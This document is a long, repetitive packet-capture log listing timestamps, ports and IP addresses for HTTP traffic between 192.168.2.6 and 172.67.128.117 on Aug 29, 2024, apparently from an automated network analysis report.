                                    Aug 29, 2024 12:02:34.240390062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240408897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240493059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240504026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240515947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240526915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240539074 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240566015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.243824005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.243835926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.243846893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.243868113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.243872881 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.243879080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.243916035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.244039059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.244051933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.244062901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.244082928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.244113922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322083950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322176933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322201967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322211981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322222948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322242022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322247028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322302103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322321892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322333097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322344065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322356939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322360039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322369099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322406054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322418928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322433949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322446108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322457075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322468042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322468996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322496891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322525978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.322591066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.322674036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323143005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323189020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323240995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323251963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323263884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323281050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323298931 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323302031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323314905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323331118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323342085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323350906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323371887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323402882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323426008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323435068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323446035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323457956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323462963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323468924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.323506117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.323520899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.324086905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.324100018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.324132919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.324151039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.564780951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564805984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564817905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564830065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564842939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564852953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564865112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564877987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564892054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564903021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.564958096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.564979076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.564991951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565016985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565046072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565068007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565078974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565088987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565103054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565107107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565130949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565156937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565300941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565313101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565318108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565324068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565330029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565340042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565351009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565363884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565366030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565376997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565391064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565396070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565413952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565413952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565445900 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565459967 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565635920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565646887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565656900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565668106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565674067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565680981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565691948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565702915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565704107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565715075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565716982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565726042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565745115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565745115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565756083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565768003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565772057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565779924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565792084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565795898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565803051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565815926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.565817118 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565841913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.565854073 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566040039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566051960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566062927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566077948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566078901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566090107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566091061 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566099882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566111088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566113949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566123962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566126108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566134930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566159964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566173077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566183090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566195011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566204071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566215992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566220999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566227913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566237926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566241026 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566256046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566272974 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566273928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566284895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566296101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566296101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566307068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566309929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566318989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566329956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566343069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566353083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566355944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566355944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566364050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566375971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566381931 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566386938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566396952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566406012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566409111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566420078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566421032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566431999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566441059 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566443920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.566468000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.566495895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567082882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567095995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567106962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567117929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567127943 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567128897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567140102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567145109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567151070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567161083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567174911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567178965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567187071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567195892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567198992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567210913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567222118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567224979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567234039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567250967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567260027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567260027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567262888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567274094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567286015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567289114 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567296982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567306995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567318916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567322016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567329884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567342997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567352057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567352057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567363977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567363977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567375898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567384958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567395926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567399979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567408085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567419052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567429066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567430973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567441940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567452908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567455053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567485094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567504883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567816973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567830086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567862988 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567874908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.567959070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567970991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567981005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567991018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.567996979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568006992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568020105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568025112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568031073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568042994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568053007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568064928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568068981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568077087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568082094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568094969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.568104982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568120003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.568149090 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592031002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592062950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592076063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592113972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592125893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592138052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592150927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592206955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592261076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592262030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592273951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592283964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592295885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592308998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592335939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592350006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592379093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592391968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592401981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592422009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592451096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592487097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592502117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592514992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592525959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592535973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592542887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592546940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592550039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592550039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592576981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592603922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592621088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592634916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592655897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592672110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592739105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592751026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592761040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592772007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592772961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592783928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592788935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592796087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592808008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592808008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.592818975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592973948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592986107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.592997074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593002081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593002081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593008995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593013048 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593020916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593038082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593065977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593205929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593219042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593230963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593241930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593245983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593255043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593274117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593302011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593308926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593319893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593343973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593369007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593693018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593738079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593771935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593782902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593810081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593832970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593856096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593867064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593877077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593888044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.593910933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593910933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593921900 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.593936920 CEST4971780192.168.2.6172.67.128.117
